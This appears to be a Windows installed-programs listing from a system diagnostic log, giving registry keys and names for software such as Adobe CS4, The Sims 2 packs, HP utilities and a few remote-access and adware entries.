"{08D2E121-7F6A-43EB-97FD-629B44903403}" = Microsoft_VC90_CRT_x86
"{098727E1-775A-4450-B573-3F441F1CA243}" = kuler
"{0A3925EA-5B0E-401B-A189-7419149747B2}" = Adobe AIR
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0B72559F-4EBC-FCBB-BF23-6D96D9AC423D}" = Comcast Universal Caller ID
"{0D6013AB-A0C7-41DC-973C-E93129C9A29F}" = Adobe Color JA Extra Settings CS4
"{0F723FC1-7606-4867-866C-CE80AD292DAF}" = Adobe CSI CS4
"{1111706F-666A-4037-7777-211328764D10}" = JavaFX 2.1.1
"{111EE7DF-FC45-40C7-98A7-753AC46B12FB}" = QuickTime 7
"{118C3943-1683-42EF-824D-C22E70DB42E7}" = Comcast Desktop Software (v1.2.1)
"{13A5E785-5197-4EAD-8EE3-D660271E49BC}" = Feedback Tool
"{14D4ED84-6A9A-45A0-96F6-1753768C3CB5}" = ESSPCD
"{14F70205-1940-4000-88C7-BE799A6B2CAD}" = Adobe Soundbooth CS4
"{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}" = Microsoft Works
"{15BF7AAF-846C-4A6D-80E1-5D1FC7FB461B}" = Adobe SGM CS4
"{1618734A-3957-4ADD-8199-F973763109A8}" = Adobe Anchor Service CS4
"{16E16F01-2E2D-4248-A42F-76261C147B6C}" = Adobe Drive CS4
"{16E6D2C1-7C90-4309-8EC4-D2212690AAA4}" = AdobeColorCommonSetRGB
"{175F0111-2968-4935-8F70-33108C6A4DE3}" = MarketResearch
"{184CE391-7E0E-4C63-9935-D7A10EDFD3C6}" = Adobe WinSoft Linguistics Plugin
"{1896E712-2B3D-45eb-BCE9-542742A51032}" = PictureMover
"{19BA08F7-C728-469C-8A35-BFBD3633BE08}" = Windows Live Movie Maker
"{1A2A15C2-6780-49c1-B296-503230E9DE00}" = The Sims™ 2 Mansion and Garden Stuff
"{1B7C06E1-4888-47A6-992A-0990B9683486}" = Adobe Version Cue CS4 Server
"{1CC069FA-1A86-402E-9787-3F04E652C67A}" = HP Support Information
"{1DCA3EAA-6EB5-4563-A970-EA14D75037BA}" = Adobe InDesign CS4
"{1E04CB54-AF4E-4AC3-B4B7-C0A160BE57F1}" = Adobe InDesign CS4 Icon Handler
"{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}" = CyberLink DVD Suite Deluxe
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{2168245A-B5AD-40D8-A641-48E3E070B5B6}" = Adobe Flash CS4 STI-en
"{217CEB43-6D22-3E1F-A311-DC0D7BFEE0A2}" = Google Talk Plugin
"{21A2F5EE-1DC5-488A-BE7E-E526F8C61488}" = DeviceDiscovery
"{21FC2093-6E43-460B-B9B0-5F5AA35BBB0F}" = Apple Application Support
"{254C37AA-6B72-4300-84F6-98A82419187E}" = ActiveCheck component for HP Active Support Library
"{26A24AE4-039D-4CA4-87B4-2F83216031FF}" = Java™ 6 Update 31
"{26A24AE4-039D-4CA4-87B4-2F83217055FF}" = Java 7 Update 55
"{272B7BEE-2259-4068-B0C3-676A6CDE8B18}" = Admin Script Editor
"{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}" = RealUpgrade 1.1
"{290CA856-3737-4874-864B-BA142F4823C8}_is1" = HP MediaSmart Demo
"{2922D6F1-2865-4EFA-97A9-94EEAB3AFA14}" = ROBLOX Studio 2013
"{297190A1-4B0D-4CD6-8B9F-3907F15C3FD8}" = Adobe CS4 American English Speech Analysis Models
"{29E5EA97-5F74-4A57-B8B2-D4F169117183}" = Adobe Stock Photos CS3
"{2A3FC24C-6EC0-4519-A52B-FDA4EA9B2D24}" = Windows Live Messenger
"{2BAF2B96-7560-48B4-87D4-10178DDBE217}" = Adobe InDesign CS4 Application Feature Set Files (Roman)
"{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}" = Microsoft XNA Framework Redistributable 4.0
"{2D03B6F8-DF36-4980-B7B6-5B93D5BA3A8F}" = essvatgt
"{2EEA7AA4-C203-4b90-A34F-19FB7EF1C81C}" = BufferChm
"{2F083216-8203-4E94-8C7C-EDF1C91D037D}" = RealWorld Cursor Editor
"{2FA41EBB-3F5A-35C3-85D6-51EC72A11FBD}" = Google Gears
"{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App" = Update Installer for WildTangent Games App
"{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1" = lightshot-5.1.0.15
"{30C8AA56-4088-426F-91D1-0EDFD3A25678}" = Adobe Dreamweaver CS4
"{32A3A4F4-B792-11D6-A78A-00B0D0160250}" = Java™ SE Development Kit 6 Update 25
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{34F4D9A4-42C2-4348-BEF4-E553C84549E7}" = Windows Live Photo Gallery
"{35D94F92-1D3A-43C5-8605-EA268B1A7BD9}" = PDF Settings CS4
"{373B1718-8CC5-4567-8EE2-9033AD08A680}" = ROBLOX Player
"{39F6E2B4-CFE8-C30A-66E8-489651F0F34C}" = Adobe Media Player
"{3A4E8896-C2E7-4084-A4A4-B8FD1894E739}" = Adobe XMP Panels CS4
"{3D2C9DE6-9ADE-4252-A241-E43723B0CE02}" = Adobe Color - Photoshop Specific CS4
"{3DA8DF9A-044E-46C4-8531-DEDBB0EE37FF}" = Adobe WinSoft Linguistics Plugin
"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel® Rapid Storage Technology
"{40B325F7-2A46-41E0-BE2F-23C19F7F101E}" = Zipper
"{40BF1E83-20EB-11D8-97C5-0009C5020658}" = Power2Go
"{428FDF9F-E010-4C4C-A8BB-156960AFCA1C}" = Adobe Fireworks CS4
"{42938595-0D83-404D-9F73-F8177FDD531A}" = ESScore
"{42C1A82C-0F7D-4B3E-AEA5-2BD75A5DF390}" = GameSalad Creator
"{43509E18-076E-40FE-AF38-CA5ED400A5A9}" = Pixel Bender Toolkit
"{43ADAE00-A4ED-4379-A76D-A1FF5D9D334A}_is1" = Xfire 2.0
"{43CDF946-F5D9-4292-B006-BA0D92013021}" = WebReg
"{44E240EC-2224-4078-A88B-2CEE0D3016EF}" = Adobe After Effects CS4 Presets
"{4537EA4B-F603-4181-89FB-2953FC695AB1}" = netbrdg
"{45A66726-69BC-466B-A7A4-12FCBA4883D7}" = HiJackThis
"{45EC816C-0771-4C14-AE6D-72D1B578F4C8}" = Adobe After Effects CS4
"{4817189D-1785-4627-A33C-39FD90919300}" = The Sims 2 Pets
"{4943EFF5-229F-435D-BEA9-BE3CAEA783A7}" = Adobe Service Manager Extension
"{497072FE-0A75-4E5C-A5B7-EB1FA67F66F1}" = DJ_AIO_05_F4400_Software_Min
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4A52555C-032A-4083-BDD9-6A85ABFB39A8}" = Adobe SING CS4
"{4A70EF07-7F88-4434-BB61-D1DE8AE93DD4}" = SolutionCenter
"{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}" = Google Earth
"{4F3E17F8-F1C8-4A4B-9EB8-1EE2D190CDA9}" = Adobe Setup
"{52232EF4-CC12-4C21-ABCF-ADB79618302D}" = Adobe Soundbooth CS4 Codecs
"{5316DFC9-CE99-4458-9AB3-E8726EDE0210}" = skin0001
"{54793AA1-5001-42F4-ABB6-C364617C6078}" = Adobe Linguistics CS3
"{5570C7F0-43D0-4916-8A9E-AEDD52FA86F4}" = Adobe Color EU Extra Settings CS4
"{55979C41-7D6A-49CC-B591-64AC1BBE2C8B}" = HP Picasso Media Center Add-In
"{561968FD-56A1-49FD-9ED0-F55482C7C5BC}" = Adobe Media Encoder CS4 Exporter
"{56589DFE-0C29-4DFE-8E42-887B771ECD23}" = ArcSoft Print Creations - Photo Book
"{579684A4-DDD5-4CA3-9EA8-7BE7D9593DB4}" = Windows Live UX Platform Language Pack
"{5A3C1721-F8ED-11E0-8AFB-B8AC6F97B88E}" = Google Earth
"{5AB5CF82-C913-4284-A764-DBB30927C2AB}" = Reflector
"{5C648FDB-0138-4619-B66E-230EF53E8E2C}" = The Sims™ 2 Teen Style Stuff
"{5EAD5443-7194-46CC-A055-428E6ABB1BAF}" = Adobe Encore CS4
"{5EE7D259-D137-4438-9A5F-42F432EC0421}" = VC80CRTRedist - 8.0.50727.4053
"{5F189DF5-2D05-472B-9091-84D9848AE48B}{1a34a8e0}" = SO.Sustainer 1.80
"{604CD5A1-4520-4844-B064-A3D884B77E91}" = SpeedyPC Pro
"{605A4E39-613C-4A12-B56F-DEFBE6757237}" = SHASTA
"{608D2A3C-6889-4C11-9B54-A42F45ACBFDB}" = fflink
"{60DB5894-B5A1-4B62-B0F3-669A22C0EE5D}" = Adobe Dynamiclink Support
"{61D6891E-E822-4448-9F9A-0AAAAEB6AF6C}" = Adobe Creative Suite 4 Master Collection
"{63C24A08-70F3-4C8E-B9FB-9F21A903801D}" = Adobe Color Video Profiles CS CS4
"{63E5CDBF-8214-4F03-84F8-CD3CE48639AD}" = Adobe Photoshop CS4 Support
"{63FF21C9-A810-464F-B60A-3111747B1A6D}" = GPBaseService2
"{6421F085-1FAA-DE13-D02A-CFB412C522A4}" = Acrobat.com
"{643EAE81-920C-4931-9F0B-4B343B225CA6}" = ESSBrwr
"{6522C636-B04C-4333-9BEB-9E0C0B6350D6}" = The Sims™ 2 Kitchen & Bath Interior Design Stuff
"{65DA2EC9-0642-47E9-AAE2-B5267AA14D75}" = Activation Assistant for the 2007 Microsoft Office suites
"{669D4A35-146B-4314-89F1-1AC3D7B88367}" = HPAsset component for HP Active Support Library
"{67A9747A-E1F5-4E9A-81CC-12B5D5B81B6E}" = Adobe After Effects CS4 Third Party Content
"{67F0E67A-8E93-4C2C-B29D-47C48262738A}" = Adobe Device Central CS4
"{68243FF8-83CA-466B-B2B8-9F99DA5479C4}" = AdobeColorCommonSetCMYK
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{68DC42FA-962C-4973-A306-D595D861FA1E}" = MySims™
"{6B2FFB21-AC88-45C3-9A7D-4BB3E744EC91}" = HPSSupply
"{6BBA26E9-AB03-4FE7-831A-3535584CA002}" = Toolbox
"{6BDD9CE6-D0A6-478A-BAD3-BA6945E89EB0}" = The Sims 2 Family Fun Stuff
"{6E17F9751-F056-4335-B718-8AF1B1092AFB}" = The Sims™ 2 IKEA® Home Stuff
"{6F3D2F66-F050-45E3-BEB1-6523FE6D6690}" = MotoHelper MergeModules
"{6FF5DD7A-FE28-4439-B8CF-1E9AF4EA0A61}" = Adobe Asset Services CS3
"{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-hp" = WildTangent Games App (HP Games)
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{73A43E42-3658-4DD9-8551-FACDA3632538}" = HP Advisor
"{7406DF60-016D-476B-A2C7-55D997592047}" = Adobe OnLocation CS4
"{758C8301-2696-4855-AF45-534B1200980A}" = Samsung Kies
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{784BEA84-FA66-4B19-BB80-7B545F248AC6}" = HP Total Care Setup
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{793D1D88-6141-43DE-BE58-59BCE31B4090}" = Adobe Flash CS4 Extension - Flash Lite STI en
"{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}" = Skype™ 6.16
"{7B3577F5-1D82-4C9B-008B-69D026FD8BCA}" = The Sims 2 Open For Business
"{7CC7BDD5-6F10-4724-96A1-EAC7D9F2831C}" = Adobe InDesign CS4 Common Base Files
"{7E265513-8CDA-4631-B696-F40D983F3B07}_is1" = CDBurnerXP
"{7F10292C-A190-4176-A665-A1ED3478DF86}" = LightScribe System Software
"{802771A9-A856-4A41-ACF7-1450E523C923}" = Adobe XMP Panels CS3
"{8186FF34-D389-4B7E-9A2F-C197585BCFBD}" = Adobe Media Encoder CS4 Importer
"{820D3F45-F6EE-4AAF-81EF-CE21FF21D230}" = Adobe Type Support CS4
"{82BF2C5E-79A7-4A13-B508-D5E64A5B141E}" = Uninstall Helper
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{83877DB1-8B77-45BC-AB43-2BAC22E093E0}" = Adobe Bridge CS4
"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform
"{842B4B72-9E8F-4962-B3C1-1C422A5C4434}" = Suite Shared Configuration CS4
"{84DDE556-43EF-43ed-B2DF-37AF9E5DDD75}" = The Sims™ 2 H&M® Fashion Stuff
"{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}" = Windows Live Sync
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{87532CAB-7932-4F84-8937-823337622807}" = Adobe Illustrator CS4
"{8792CEDD-7FFF-A9FC-430C-357D9277715D}" = Catalyst Control Center InstallProxy
"{87F6C83D-F949-4d14-B5CB-DC8C75F8932D}" = The Sims™ 2 FreeTime
"{8943CE61-53BD-475E-90E1-A580869E98A2}" = staticcr
"{8A502E38-29C9-49FA-BCFA-D727CA062589}" = ESSTOOLS
"{8AB8D458-939E-403F-0097-9BA1C1F013D5}" = The Sims 2
"{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}" = NVIDIA PhysX
"{8C36FC6F-3576-447C-B15D-FF1504C91104}_is1" = DllTool 1.0
"{8D2BA474-F406-4710-9AE4-D4F22D21F0DD}" = Adobe Device Central CS3
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8DF41A9F-FE13-43E8-A003-5F9B55A011EE}" = Facebook Video Calling 2.0.0.447
"{8E92D746-CD9F-4B90-9668-42B74C14F765}" = ESSini
"{8EAD600D-1912-4DEF-92B5-0C7525E17ED2}" = F4400
"{8FF6F5CA-4E30-4E3B-B951-204CAAA2716A}" = SmartWebPrinting
"{90024193-9F13-4877-89D5-A1CDF0CBBF28}" = Feedback Tool
"{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
"{90120000-0020-0409-0000-0000000FF1CE}" = Compatibility Pack for the 2007 Office system
"{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{90176341-0A8B-4CCC-A78D-F862228A6B95}" = Adobe Anchor Service CS3
"{90850409-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Word Viewer 2003
"{91120000-002F-0000-0000-0000000FF1CE}" = Microsoft Office Home and Student 2007
"{91517631-A9F3-4B7C-B482-43E0068FD55A}" = ESSgui
"{92D58719-BBC1-4CC3-A08B-56C9E884CC2C}" = Microsoft_VC80_CRT_x86
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{931AB7EA-3656-4BB7-864D-022B09E3DD67}" = Adobe Linguistics CS4
"{94CAC2F1-C856-47F4-AF24-65A1E75AEDB9}" = MotoHelper MergeModules
"{94D398EB-D2FD-4FD1-B8C4-592635E8A191}" = Adobe CMaps CS4
"{95120000-00AF-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint Viewer 2007 (English)
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9559F7CA-5E34-4237-A2D9-D856464AD727}" = Project64 1.6
"{9591C049-5CAE-4E89-A8D9-191F1899628B}" = ArcSoft Print Creations - Funhouse
"{97486FBE-A3FC-4783-8D55-EA37E9D171CC}" = HP Update
"{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}" = Visual Studio 2012 x86 Redistributables
"{999D43F4-9709-4887-9B1A-83EBB15A8370}" = VPRINTOL
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9C9824D9-9000-4373-A6A5-D0E5D4831394}" = Adobe Bridge CS3
"{9CC89170-000B-457D-91F1-53691F85B223}" = Python 2.6.1
"{9CDBC303-3EED-40b0-8E41-A7C65AA96C26}" = The Sims 2 Glamour Life Stuff
"{9E1BAB75-EB78-440D-94C0-A3857BE2E733}" = System Requirements Lab
"{9F1F2AEA-C72A-4DD6-991E-C5506A5625E4}" = OpenOffice.org 3.4.1
"{9F20C738-6E93-74DC-D4B3-AAEBB1B5BF4B}" = centipedeMenu
"{A0640EC2-B97E-4FC1-AD14-227C9E386BB4}" = HP Recovery Manager RSS
"{A49F249F-0C91-497F-86DF-B2585E8E76B7}" = Microsoft Visual C++ 2005 Redistributable
"{A6EC82A0-1414-475D-8AFD-469089F3080D}" = Adobe Contribute CS4
"{A8D93648-9F7F-407D-915C-62044644C3DA}" = MSI to redistribute MS VS2005 CRT libraries
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{A9E27FF5-6294-46A8-B8FD-77B1DECA3021}" = Wizard101
"{AC6E9B2A-A7E6-4B17-8A6C-29D519673E12}" = Shopping Helper Smartbar
"{AC76BA86-1033-F400-7760-000000000004}" = Adobe Acrobat 9 Pro - English, Français, Deutsch
"{AC76BA86-7AD7-1033-7B44-AA1000000001}" = Adobe Reader X (10.1.10)
"{AE1FA02D-E6A4-4EA0-8E58-6483CAC016DD}" = ESSCDBK
"{AE8705FB-E13C-40A9-8A2D-68D6733FBFC2}" = Status
"{B05DE7B7-0B40-4411-BD4B-222CAE2D8F15}" = Adobe MotionPicture Color Files CS4
"{B0D83FCD-9D42-43ED-8315-250326AADA02}" = ArcSoft Print Creations - Scrapbook
"{B15381DD-FF97-4FCD-A881-ED4DB0975500}" = Adobe Color Video Profiles AE CS4
"{B162D0A6-9A1D-4B7C-91A5-88FB48113C45}" = OfotoXMI
"{B169BC97-B8AA-4ACA-9CF2-9D0FF5BABDF7}" = Adobe Premiere Pro CS4 Functional Content
"{B1899CD8-9584-4DC5-00AE-48F47CF81183}" = The Sims 2 HomeCrafter Plus
"{B2042D5E-986D-44EC-AEE3-AFE4108CCC93}" = Python 3.2
"{B29AD377-CC12-490A-A480-1452337C618D}" = Connect
"{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}" = HP MediaSmart Music/Photo/Video
"{B3BF6689-A81D-40D8-9A86-4AC4ACD9FC1C}" = Adobe Camera Raw 4.0
"{B3DAF54F-DB25-4586-9EF1-96D24BB14088}" = Windows Movie Maker 2.6
"{B4B44FE7-41FF-4DAD-8C0A-E406DDA72992}" = CCScore
"{B65BA85C-0A27-4BC0-A22D-A66F0E5B9494}" = Adobe Photoshop CS4
"{B6F5B704-06D3-4687-90F3-6195304AD755}" = The Sims™ 2 Apartment Life
"{B84739A3-F943-47E4-95D8-96381EF5AC48}" = HP Customer Experience Enhancements
"{B8AC1A89-FFD1-4F97-8051-E505A160F562}" = HP Odometer
"{B92C5909-1D37-4C51-8397-A28BB28E5DC3}" = Facebook Video Calling 1.2.0.287
"{B9F4561A-924D-4510-A85A-BB0960C338CB}" = Adobe Asset Services CS4
"{BB4E33EC-8181-4685-96F7-8554293DEC6A}" = Adobe Output Module
"{BBB7F293-12A9-821C-9409-013CD8E824EC}" = Application Profiles
"{BD7204BA-DD64-499E-9B55-6A282CDF4FA4}" = Destinations
"{BE9CEAAA-F069-4331-BF2F-8D350F6504F4}" = Adobe Media Encoder CS4 Additional Exporter
"{BEE64C14-BEF1-4610-8A68-A16EAA47B882}" = Futuremark SystemInfo
"{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}" = The Sims™ 3
"{C22378E6-9A65-438E-964C-7DB8FBB568DE}" = LogMeIn Hamachi
"{C2D69781-F392-4118-A5A7-C7E9C38DBFC2}" = Adobe ExtendScript Toolkit 2
"{C43326F5-F135-4551-8270-7F7ABA0462E1}" = HPProductAssistant
"{C52E3EC1-048C-45E1-8D53-10B0C6509683}" = Adobe Default Language CS4
"{C59C179C-668D-49A9-B6EA-0121CCFC1243}" = LabelPrint
"{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}" = SNT
"{C75CDBA2-3C86-481e-BD10-BDDA758F9DFF}" = hpPrintProjects
"{C938BE91-3BB5-4B84-9EF6-88F0505D0038}" = Adobe Premiere Pro CS4 Third Party Content
"{CA9ED5E4-1548-485B-A293-417840060158}" = ArcSoft Print Creations - Photo Calendar
"{CAE4213F-F797-439D-BD9E-79B71D115BE3}" = HPPhotoGadget
"{CAE8A0F1-B498-4C23-95FA-55047E730C8F}" = ArcSoft Print Creations
"{CB099890-1D5F-11D5-9EA9-0050BAE317E1}" = PowerDirector
"{CC75AB5C-2110-4A7F-AF52-708680D22FE8}" = Photoshop Camera Raw
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{D0DFF92A-492E-4C40-B862-A74A173C25C5}" = Adobe Version Cue CS3 Client
"{D12D3F3B-D79F-4057-B958-F7D954A9D98E}" = Atari Classics Evolved-Centipede
"{D32470A1-B10C-4059-BA53-CF0486F68EBC}" = Kodak EasyShare software
"{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}" = GTA San Andreas
"{D436F577-1695-4D2F-8B44-AC76C99E0002}" = Windows Live Photo Common
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{D499F8DE-3F31-4900-9157-61061613704B}" = Adobe Premiere Pro CS4
"{DB02F716-6275-42E9-B8D2-83BA2BF5100B}" = SFR
"{DC0A5F99-FD66-433F-9D3A-05DCBA64BE42}" = TrayApp
"{DCCAD079-F92C-44DA-B258-624FC6517A5A}" = HP MediaSmart DVD
"{DEB90B8E-0DCB-48CE-B90E-8842A2BD643E}" = Adobe Media Encoder CS4
"{DFEF49D9-FC95-4301-99B9-2FB91C6ABA06}" = The Sims 2 Seasons
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E17141A6-211D-5854-61D9-69827A430D82}" = EA Download Manager UI
"{E3E71D07-CD27-46CB-8448-16D4FB29AA13}" = Microsoft WSE 3.0 Runtime
"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger
"{E69AE897-9E0B-485C-8552-7841F48D42D8}" = Adobe Update Manager CS3
"{E6B4117F-AC59-4B13-9274-EB136E8897EE}" = ArcSoft Print Creations - Album Page
"{E82A57BC-E9B8-42F9-BDC7-4950BD73EA32}_is1" = Pazera Free FLV to AVI Converter 1.5
"{E8EE9410-8AC4-4F43-A626-DDECA75C79F3}" = Adobe Setup
"{E9E34215-82EF-4909-BE2F-F581F0DC9062}" = DirectX for Managed Code Update (Summer 2004)
"{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}" = Nexon Game Manager
"{EAA38532-7AD0-4f78-918A-4F4F02096ECE}" = The Sims™ 2 Celebration! Stuff
"{EE353798-E875-42E0-B58D-7E6696182EA8}" = Adobe Media Encoder CS4 Dolby
"{F04F9557-81A9-4293-BC49-2C216FA325A7}" = ArcSoft Print Creations - Greeting Card
"{F08E8D2E-F132-4742-9C87-D5FF223A016A}" = Adobe Illustrator CS3
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F0E64E2E-3A60-40D8-A55D-92F6831875DA}" = Adobe Search for Help
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F248ADFA-64E0-4b03-8A83-059078BED6A0}" = The Sims™ 2 Bon Voyage
"{F4A2E7CC-60CA-4AFA-B67F-AD5E58173C3F}" = SKINXSDK
"{F6E99614-F042-4459-82B7-8B38B2601356}" = Adobe Flash CS4
"{F7529650-B9DB-481B-0089-A2AC3C2821C1}" = The Sims 2 Nightlife
"{F7FC9307-374E-4017-8E9D-DE1154780480}" = System Requirements Lab for Intel
"{F8EF2B3F-C345-4F20-8FE4-791A20333CD5}" = Adobe ExtendScript Toolkit CS4
"{F93C84A6-0DC6-42AF-89FA-776F7C377353}" = Adobe PDF Library Files CS4
"{F9593CFB-D836-49BC-BFF1-0E669A411D9F}" = WIRELESS
"{F960179C-72F7-4516-A71A-C7AE5D18DD84}_is1" = xParanormal Detector version 2.5
"{FAF26102-09D7-4C58-AB01-0D59A2E517CA}" = Copy
"{FB2A5FCC-B81B-48C2-A009-7804694D83E9}" = Adobe Encore CS4 Codecs
"{FCDB1C92-03C6-4C76-8625-371224256091}" = ESSPDock
"{FCDD51BB-CAD0-4BB1-B7DF-CE86D1032794}" = Adobe Fonts All
"{FD9C31B6-F572-414D-81E3-89368C97A125}_is1" = CamStudio OSS Desktop Recorder
"{FE044230-9CA5-43F7-9B58-5AC5A28A1F33}" = Windows Live Essentials
"{FE23D063-934D-4829-A0D8-00634CE79B4A}" = Adobe AIR
"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"{FF890228-5396-4BB0-B500-6E2843D7DD63}" = Equalify v2.2.1 (Stable)
"360TotalSecurity" = 360 Total Security
"7-Zip" = 7-zip v9.20
"A&N File Recovery" = A&N File Recovery
"Activation Assistant for the 2007 Microsoft Office suites" = Activation Assistant for the 2007 Microsoft Office suites
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 13 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 13 Plugin
"Adobe Photoshop CS6" = Adobe Photoshop CS6
"Adobe_a04a925a57548091300ada368235fc6" = Adobe Illustrator CS3
"Adobe_b2d6abde968e6f277ddbfd501383e02" = Adobe Creative Suite 4 Master Collection
"Advanced Audio FX Engine" = Advanced Audio FX Engine
"Advanced Video FX Engine" = Advanced Video FX Engine
"AIM_7" = AIM 7
"Anvi Smart Defender" = Anvi Smart Defender 2.0
"Atari Classics Evolved-Centipede" = Atari Classics Evolved-Centipede
"Audacity_is1" = Audacity 1.2.6
"Bandicam" = Bandicam
"BandiMPEG1" = Bandisoft MPEG-1 Decoder
"Cheat Engine 6.2_is1" = Cheat Engine 6.2
"Cheat Engine 6.3_is1" = Cheat Engine 6.3
"Cloud System Booster" = Cloud System Booster
"Clownfish" = Clownfish for Skype
"Combat Arms" = Combat Arms
"Combined Community Codec Pack_is1" = Combined Community Codec Pack 2009-09-09
"CrystalDiskInfo_is1" = CrystalDiskInfo 5.4.2 Shizuku Edition
"DarkComet RAT Legacy_is1" = DarkComet RAT Legacy version 5.4
"Dev-C++" = Dev-C++ 5 beta 9 release (4.9.9.2)
"DivX Setup.divx.com" = DivX Setup
"DomaIQ Uninstaller" = DomaIQ
"EA Download Manager" = EA Download Manager
"Easy Auto Clicker_is1" = Easy Auto Clicker
"FBDBServer_2_1_is1" = Firebird 2.1.3.18185 (Win32)
"Free Studio_is1" = Free Studio version 5.7.5.1005
"Google Chrome" = Google Chrome
"HaaliMkx" = Haali Media Splitter
"Havij_is1" = Havij 1.15 Free
"HD Tune_is1" = HD Tune 2.55
"HOMESTUDENTR" = Microsoft Office Home and Student 2007
"IceChat_is1" = IceChat 7.70 (Build 20101031)
"InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}" = CyberLink DVD Suite Deluxe
"InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}" = Power2Go
"InstallShield_{758C8301-2696-4855-AF45-534B1200980A}" = Samsung Kies
"InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}" = HP MediaSmart Music/Photo/Video
"InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}" = LabelPrint
"InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}" = PowerDirector
"InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}" = HP MediaSmart DVD
"LAME for Audacity_is1" = LAME v3.98.2 for Audacity
"LogMeIn Hamachi" = LogMeIn Hamachi
"ManyCam" = ManyCam 3.0.80 (remove only)
"Messenger Plus!" = Messenger Plus! 6
"Mozilla Firefox 29.0.1 (x86 en-US)" = Mozilla Firefox 29.0.1 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MultiBit 0.5.18" = MultiBit 0.5.18
"MySQL Servers and Clients 3.23.52" = MySQL Servers and Clients 3.23.52
"OpenAL" = OpenAL
"PC Wizard 2010_is1" = PC Wizard 2010.1.94
"PremiumSoft Navicat Premium_is1" = PremiumSoft Navicat Premium 11.0
